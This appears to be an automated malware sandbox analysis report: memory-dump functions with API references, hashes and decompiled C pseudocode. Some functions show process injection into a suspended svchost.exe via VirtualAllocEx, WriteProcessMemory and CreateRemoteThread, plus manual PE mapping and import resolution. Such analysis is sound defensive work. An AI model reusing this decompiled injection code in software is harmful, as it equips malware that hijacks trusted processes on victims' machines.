                                                                                                                                                    0x00000000
                                                                                                                                                    0x00611956
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00611956
                                                                                                                                                    0x00611954
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006118f5
                                                                                                                                                    0x0061197d

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00611390: GetProcessHeap.KERNEL32(?,00611886,00100000), ref: 0061139C
                                                                                                                                                      • Part of subcall function 00611390: RtlAllocateHeap.NTDLL(01380000,00000000,00611886,?,00611886,00100000), ref: 006113BD
                                                                                                                                                      • Part of subcall function 00611A80: GetVersion.KERNEL32(?,006118CD,?,00100000,?), ref: 00611A8D
                                                                                                                                                      • Part of subcall function 00611A80: wsprintfA.USER32 ref: 00611B3E
                                                                                                                                                    • Sleep.KERNELBASE(0000EA60), ref: 0061195F
                                                                                                                                                    • Sleep.KERNELBASE(0000EA60), ref: 0061196F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HeapSleep$AllocateProcessVersionwsprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1739176888-0
                                                                                                                                                    • Opcode ID: 9daa3e4bc12d506931837538422eea4f2bbfd43363ae36e9e6d85b3ac3f68a15
                                                                                                                                                    • Instruction ID: c2d583be903a656a6d2326b5574b8e5466d0c3fd469828b1f1183dad9fa83291
                                                                                                                                                    • Opcode Fuzzy Hash: 9daa3e4bc12d506931837538422eea4f2bbfd43363ae36e9e6d85b3ac3f68a15
                                                                                                                                                    • Instruction Fuzzy Hash: 9531E5F5D002099BCF50DBD0D851AEEB77AAF0A305F188419E219BB341E7359A84CB96
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00659FEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00650D67: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 00650DA8
                                                                                                                                                    • _free.LIBCMT ref: 0065A05D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 614378929-0
                                                                                                                                                    • Opcode ID: 149e36dedd55b9eb0563fd4c3a0b4f1dcc4d21c8996fabd591b521a4ca3340f8
                                                                                                                                                    • Instruction ID: 3a1207b41c6d4676123a8ae0c4fad37925fe2e4b1c9c342888080dfd4c6091e1
                                                                                                                                                    • Opcode Fuzzy Hash: 149e36dedd55b9eb0563fd4c3a0b4f1dcc4d21c8996fabd591b521a4ca3340f8
                                                                                                                                                    • Instruction Fuzzy Hash: 9F014972600356ABC3308F98D8819DAFBD9EB05375F10032DE945B76C0E370AC04C7A4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00650D67, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 00650DA8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                    • Opcode ID: 147e0b6cb8d2085475916373d5b969a1ca4e552eb17018fa446d8f1dc223b373
                                                                                                                                                    • Instruction ID: c1e39abc33c238841df128e49a5edd2cbcffa8180e92ec94bf8f7c46d0a9fd00
                                                                                                                                                    • Opcode Fuzzy Hash: 147e0b6cb8d2085475916373d5b969a1ca4e552eb17018fa446d8f1dc223b373
                                                                                                                                                    • Instruction Fuzzy Hash: 4DF0B43260122066FB615AA1DC05AAB7B6BAF41762F145311EC4496291CA30F80986E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00650D19, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00650D4B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                    • Opcode ID: 56856869e71323a31d5d023d5c4ec6784aa212a10a96036a209f4be00108629d
                                                                                                                                                    • Instruction ID: 17d97e1f88bb3d579470337860a4c73100c8d7b13b874ed606b0b0be8e965ca3
                                                                                                                                                    • Opcode Fuzzy Hash: 56856869e71323a31d5d023d5c4ec6784aa212a10a96036a209f4be00108629d
                                                                                                                                                    • Instruction Fuzzy Hash: 45E0E535500221AAF7702BE5AC05BAB3AAFDF013A2F640310EC88962A1CA60EC4442E5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 006113D0, Relevance: 1.5, APIs: 1, Instructions: 12memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E006113D0(void* _a4) {
				void* _t2;
				char _t4;
				void* _t5;

				if( *0x61715c != 0) {
					_t5 =  *0x61715c; // 0x1380000
					_t4 = RtlFreeHeap(_t5, 0, _a4); // executed
					return _t4;
				}
				return _t2;
			}






                                                                                                                                                    0x006113da
                                                                                                                                                    0x006113e2
                                                                                                                                                    0x006113e9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006113e9
                                                                                                                                                    0x006113f0

                                                                                                                                                    APIs
                                                                                                                                                    • RtlFreeHeap.NTDLL(01380000,00000000,00611CED,?,00611CED,?,?,?,?,00612625,?,00611A9B), ref: 006113E9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                    • Opcode ID: 698ce7d0f0ea9ecb0e32b62967a13325724e85a6babb7a1519bf47dcdcaad9cd
                                                                                                                                                    • Instruction ID: 6988ced2c4c9f4f10874c9ff5e1294614650e29725f817a32cb2186a559ac834
                                                                                                                                                    • Opcode Fuzzy Hash: 698ce7d0f0ea9ecb0e32b62967a13325724e85a6babb7a1519bf47dcdcaad9cd
                                                                                                                                                    • Instruction Fuzzy Hash: EFC01231104204ABD3089F86FC49BE5336F9306301F0C9105B7084B6A0C6759980CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 00613860, Relevance: 10.6, APIs: 7, Instructions: 103memorythreadinjectionCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                    			E00613860(void* _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				long _v36;

				if(_a12 == 0) {
					_v8 = VirtualAlloc(0, _a8, 0x3000, 0x40);
					if(_v8 == 0) {
						L14:
						return 0;
					}
					E00611450(_v8, _a4, _a8);
					if(_a16 == 0) {
						_v28 = _v8;
						_v28();
						return 1;
					}
					_v24 = CreateThread(0, 0, E006139C0, _v8, 0, 0);
					if(_v24 == 0) {
						goto L14;
					}
					CloseHandle(_v24);
					return 1;
				}
				if(E00612C20( &_v16,  &_v32) != 0) {
					_v12 = VirtualAllocEx(_v16, 0, _a8, 0x3000, 0x40);
					if(_v12 == 0 || WriteProcessMemory(_v16, _v12, _a4, _a8, 0) == 0) {
						L7:
						goto L14;
					} else {
						_v20 = CreateRemoteThread(_v16, 0, 0, _v12, 0, 0,  &_v36);
						if(_v20 == 0) {
							goto L7;
						}
						CloseHandle(_v20);
						return 1;
					}
				}
				return 0;
			}











                                                                                                                                                    0x0061386a
                                                                                                                                                    0x00613910
                                                                                                                                                    0x00613917
                                                                                                                                                    0x00613976
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00613976
                                                                                                                                                    0x00613925
                                                                                                                                                    0x00613931
                                                                                                                                                    0x00613969
                                                                                                                                                    0x0061396c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0061396f
                                                                                                                                                    0x0061394a
                                                                                                                                                    0x00613951
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00613964
                                                                                                                                                    0x00613957
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0061395d
                                                                                                                                                    0x00613882
                                                                                                                                                    0x006138a2
                                                                                                                                                    0x006138a9
                                                                                                                                                    0x006138fb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006138c7
                                                                                                                                                    0x006138e1
                                                                                                                                                    0x006138e8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006138ee
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006138f4
                                                                                                                                                    0x006138a9
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAllocEx.KERNEL32(00500000,00000000,00500000,00003000,00000040,?,?,?,?,?,00611F97), ref: 0061389C
                                                                                                                                                    • WriteProcessMemory.KERNEL32(00500000,00000000,00000000,00500000,00000000,?,?,?,?,?,00611F97), ref: 006138BD
                                                                                                                                                    • CreateRemoteThread.KERNEL32(00500000,00000000,00000000,00000000,00000000,00000000,?), ref: 006138DB
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00611F97), ref: 006138EE
                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000040,?,?,?,00611F97), ref: 0061390A
                                                                                                                                                    • CreateThread.KERNEL32 ref: 00613944
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00613957
                                                                                                                                                      • Part of subcall function 00612C20: GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 00612C51
                                                                                                                                                      • Part of subcall function 00612C20: lstrcatA.KERNEL32(?,\System32\svchost.exe), ref: 00612C63
                                                                                                                                                      • Part of subcall function 00612C20: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000424,00000000,00000000,00000044,?), ref: 00612C89
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create$AllocCloseHandleProcessThreadVirtual$EnvironmentMemoryRemoteVariableWritelstrcat
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2742758278-0
                                                                                                                                                    • Opcode ID: e1fe2eef37ffb59765205190ff31ed80c251620db0ced5d6d0908cc182484c5c
                                                                                                                                                    • Instruction ID: c03e946215e131b4c26eb5ac98fa621491933b1faaeb71bec55963645a9ffe35
                                                                                                                                                    • Opcode Fuzzy Hash: e1fe2eef37ffb59765205190ff31ed80c251620db0ced5d6d0908cc182484c5c
                                                                                                                                                    • Instruction Fuzzy Hash: 1E312F75A04218FBDB14CFA4DC49BEE777AAB48701F148519F606AB3D0E7B49B80CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0065C56F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,0065C88D,00000002,00000000,?,?,?,0065C88D,?,00000000), ref: 0065C608
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,0065C88D,00000002,00000000,?,?,?,0065C88D,?,00000000), ref: 0065C631
                                                                                                                                                    • GetACP.KERNEL32(?,?,0065C88D,?,00000000), ref: 0065C646
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                    • Opcode ID: 4be5178a30e26d22d74885b221760d718e1fbd9167716d5c679615fd01fd6c4f
                                                                                                                                                    • Instruction ID: c43a28e0da538051f006be51020169cb6003df2bc5b8cded01121d012fa7dc39
                                                                                                                                                    • Opcode Fuzzy Hash: 4be5178a30e26d22d74885b221760d718e1fbd9167716d5c679615fd01fd6c4f
                                                                                                                                                    • Instruction Fuzzy Hash: FD21AC72A00301AEEB348F94C940AD777A7AB50B76F565164EE0AD7300FB32EE49C390
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00657096, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$InformationTimeZone
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 597776487-0
                                                                                                                                                    • Opcode ID: 07a23ac7d2711a4fdeba619da94bd89c81736c0fae679dba72fbf83ecf13791b
                                                                                                                                                    • Instruction ID: 215e07de9d9a2c005103b9898deb2ce965b070483b8b41ec6baefeb127d6bc40
                                                                                                                                                    • Opcode Fuzzy Hash: 07a23ac7d2711a4fdeba619da94bd89c81736c0fae679dba72fbf83ecf13791b
                                                                                                                                                    • Instruction Fuzzy Hash: F5C11571908205AFDB209F78EC45AEA7BEBEF55351F2841AEEC80D7381E6308E49D754
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0065BDC5, Relevance: 7.8, APIs: 5, Instructions: 251COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00650A7B: GetLastError.KERNEL32(?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650A80
                                                                                                                                                      • Part of subcall function 00650A7B: SetLastError.KERNEL32(00000000,006A9220,000000FF,?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650B1E
                                                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,0064D044,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0065BE86
                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0064D044,?,?,?,00000055,?,-00000050,?,?), ref: 0065BEB1
                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0065BF45
                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0065BF53
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0065C014
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4147378913-0
                                                                                                                                                    • Opcode ID: a96e40795f3bde9534c0303835310a51da1055dcae44d854188a2bb7cc5dbd00
                                                                                                                                                    • Instruction ID: ff04e3df0b077a6c02c1c3da63cb1c5a01b8bf77d860a8c945cb1337e8228a7d
                                                                                                                                                    • Opcode Fuzzy Hash: a96e40795f3bde9534c0303835310a51da1055dcae44d854188a2bb7cc5dbd00
                                                                                                                                                    • Instruction Fuzzy Hash: 3371E671600702AADB24AF34CC42BFA73AAEF44752F14542DFE05DB281EB75E9498B64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0065C744, Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00650A7B: GetLastError.KERNEL32(?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650A80
                                                                                                                                                      • Part of subcall function 00650A7B: SetLastError.KERNEL32(00000000,006A9220,000000FF,?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650B1E
                                                                                                                                                      • Part of subcall function 00650A7B: _free.LIBCMT ref: 00650ADD
                                                                                                                                                      • Part of subcall function 00650A7B: _free.LIBCMT ref: 00650B13
                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0065C850
                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 0065C899
                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0065C8A8
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0065C8F0
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0065C90F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 949163717-0
                                                                                                                                                    • Opcode ID: 7c8e89200a49c7e021660c8a5c7fd066344b5fc5cfd65f6df8a990151af56a6f
                                                                                                                                                    • Instruction ID: d8515e79be9801bbba502fcc56cc8a35538f4602b9311c662252d186e73fa065
                                                                                                                                                    • Opcode Fuzzy Hash: 7c8e89200a49c7e021660c8a5c7fd066344b5fc5cfd65f6df8a990151af56a6f
                                                                                                                                                    • Instruction Fuzzy Hash: B0518371A00705AFEB10DFA5CC45AFE77BABF48712F144129ED15E7291EBB09948CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00613250, Relevance: 6.1, APIs: 4, Instructions: 113memoryinjectionCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                    			E00613250(void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				void* _t57;
				void* _t59;
				void* _t92;
				void* _t93;

				_t3 = _a8 + 0x3c; // 0xf445c7f8
				_v24 = _a8 +  *_t3;
				_v16 =  *((intOrPtr*)(_v24 + 0x34));
				_v20 =  *((intOrPtr*)(_v24 + 0x50));
				_v12 = 0;
				_v8 = 0;
				_v28 = 0;
				while(1) {
					_v8 = VirtualAllocEx(_a4, _v16, _v20, 0x3000, 0x40);
					if(_v8 == 0) {
						_v8 = VirtualAllocEx(_a4, 0, _v20, 0x3000, 0x40);
						_v16 = _v8;
					}
					if(_v8 == 0) {
						break;
					}
					_t57 = E00611390(_v20);
					_t93 = _t92 + 4;
					_v12 = _t57;
					if(_v12 != 0) {
						_t59 = E006139E0(_a8, _a12, _v12, _v16);
						_t92 = _t93 + 0x10;
						if(_t59 == 0) {
						} else {
							if(_a16 != 0) {
								 *_a16 = _v16;
							}
							if(_a20 != 0) {
								 *_a20 = _v16 +  *((intOrPtr*)(_v24 + 0x28));
							}
							if(WriteProcessMemory(_a4, _v8, _v12, _v20, 0) != 0) {
								_v28 = 1;
								if(0 != 0) {
									continue;
								}
							} else {
							}
						}
					} else {
					}
					L17:
					if(_v12 != 0) {
						E006113D0(_v12);
					}
					if(_v8 != 0 && _v28 == 0) {
						VirtualFreeEx(_a4, _v8, 0, 0x8000);
					}
					return _v28;
				}
				goto L17;
			}













                                                                                                                                                    0x0061325c
                                                                                                                                                    0x0061325f
                                                                                                                                                    0x00613268
                                                                                                                                                    0x00613271
                                                                                                                                                    0x00613274
                                                                                                                                                    0x0061327b
                                                                                                                                                    0x00613282
                                                                                                                                                    0x00613289
                                                                                                                                                    0x006132a2
                                                                                                                                                    0x006132a9
                                                                                                                                                    0x006132c2
                                                                                                                                                    0x006132c8
                                                                                                                                                    0x006132c8
                                                                                                                                                    0x006132cf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006132da
                                                                                                                                                    0x006132df
                                                                                                                                                    0x006132e2
                                                                                                                                                    0x006132e9
                                                                                                                                                    0x006132fd
                                                                                                                                                    0x00613302
                                                                                                                                                    0x00613307
                                                                                                                                                    0x00613309
                                                                                                                                                    0x0061330d
                                                                                                                                                    0x00613315
                                                                                                                                                    0x00613315
                                                                                                                                                    0x0061331b
                                                                                                                                                    0x00613329
                                                                                                                                                    0x00613329
                                                                                                                                                    0x00613349
                                                                                                                                                    0x0061334d
                                                                                                                                                    0x00613356
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0061334b
                                                                                                                                                    0x00613349
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006132eb
                                                                                                                                                    0x0061335c
                                                                                                                                                    0x00613360
                                                                                                                                                    0x00613366
                                                                                                                                                    0x0061336b
                                                                                                                                                    0x00613372
                                                                                                                                                    0x00613389
                                                                                                                                                    0x00613389
                                                                                                                                                    0x00613395
                                                                                                                                                    0x00613395
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAllocEx.KERNEL32(00000000,00611EAF,FFFFFFFF,00003000,00000040), ref: 0061329C
                                                                                                                                                    • VirtualAllocEx.KERNEL32(00000000,00000000,FFFFFFFF,00003000,00000040), ref: 006132BC
                                                                                                                                                      • Part of subcall function 00611390: GetProcessHeap.KERNEL32(?,00611886,00100000), ref: 0061139C
                                                                                                                                                      • Part of subcall function 00611390: RtlAllocateHeap.NTDLL(01380000,00000000,00611886,?,00611886,00100000), ref: 006113BD
                                                                                                                                                    • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,FFFFFFFF,00000000), ref: 00613341
                                                                                                                                                    • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000), ref: 00613389
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Virtual$AllocHeapProcess$AllocateFreeMemoryWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2713107948-0
                                                                                                                                                    • Opcode ID: 35fbc9810c1ef8629927f2afbf2417da3d903e3c9eaf03c3c7bcc4a95b6ac0a4
                                                                                                                                                    • Instruction ID: 5fc7d5d6c24be4d38e73b69cc56678e373c9e9535d8b2e3a89cc5b623ce296b1
                                                                                                                                                    • Opcode Fuzzy Hash: 35fbc9810c1ef8629927f2afbf2417da3d903e3c9eaf03c3c7bcc4a95b6ac0a4
                                                                                                                                                    • Instruction Fuzzy Hash: C04130B4A00219EFDB14CF94C845BEEB7B6BF48304F188159EA16A7380D7709B84CB95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00613560, Relevance: 6.1, APIs: 4, Instructions: 105libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00613560(intOrPtr _a4) {
				intOrPtr* _v8;
				struct HINSTANCE__* _v12;
				void* _v16;
				signed int* _v20;
				_Unknown_base(*)()* _v24;
				CHAR* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				intOrPtr _v48;

				_v32 = _a4;
				_v36 = _a4 +  *((intOrPtr*)(_v32 + 0x3c));
				_v40 = _v36 + 0xbadc25;
				_v44 =  *_v40;
				_v8 = _a4 + _v44;
				while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
					_v28 = _a4 +  *((intOrPtr*)(_v8 + 0xc));
					_v12 = 0;
					_v12 = GetModuleHandleA(_v28);
					if(_v12 == 0) {
						_v12 = LoadLibraryA(_v28);
					}
					if(_v12 != 0) {
						_v16 = _a4 +  *((intOrPtr*)(_v8 + 0x10));
						_v20 = _a4 +  *_v8;
						if( *_v8 == 0) {
							_v20 = _v16;
						}
						while( *_v16 != 0) {
							_v48 = _a4 +  *_v20;
							_v24 = 0;
							if(( *_v20 & 0x80000000) == 0) {
								_v24 = GetProcAddress(_v12, _v48 + 2);
							} else {
								_v24 = GetProcAddress(_v12,  *_v20 & 0x0000ffff);
							}
							if( *_v16 != _v24) {
								 *_v16 = _v24;
							}
							_v16 = _v16 + 4;
							_v20 =  &(_v20[1]);
						}
						_v8 = _v8 + 0x14;
						continue;
					} else {
						return 0;
					}
				}
				return 1;
			}














                                                                                                                                                    0x00613569
                                                                                                                                                    0x00613575
                                                                                                                                                    0x00613587
                                                                                                                                                    0x0061358f
                                                                                                                                                    0x00613598
                                                                                                                                                    0x0061359b
                                                                                                                                                    0x006135b1
                                                                                                                                                    0x006135b4
                                                                                                                                                    0x006135c5
                                                                                                                                                    0x006135cc
                                                                                                                                                    0x006135d8
                                                                                                                                                    0x006135d8
                                                                                                                                                    0x006135df
                                                                                                                                                    0x006135f1
                                                                                                                                                    0x006135fc
                                                                                                                                                    0x00613605
                                                                                                                                                    0x0061360a
                                                                                                                                                    0x0061360a
                                                                                                                                                    0x0061360d
                                                                                                                                                    0x0061361d
                                                                                                                                                    0x00613620
                                                                                                                                                    0x00613631
                                                                                                                                                    0x0061365f
                                                                                                                                                    0x00613633
                                                                                                                                                    0x00613649
                                                                                                                                                    0x00613649
                                                                                                                                                    0x0061366a
                                                                                                                                                    0x00613672
                                                                                                                                                    0x00613672
                                                                                                                                                    0x0061367a
                                                                                                                                                    0x00613683
                                                                                                                                                    0x00613683
                                                                                                                                                    0x0061368e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006135e1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006135e1
                                                                                                                                                    0x006135df
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleA.KERNEL32(?), ref: 006135BF
                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 006135D2
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00613643
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00613659
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 384173800-0
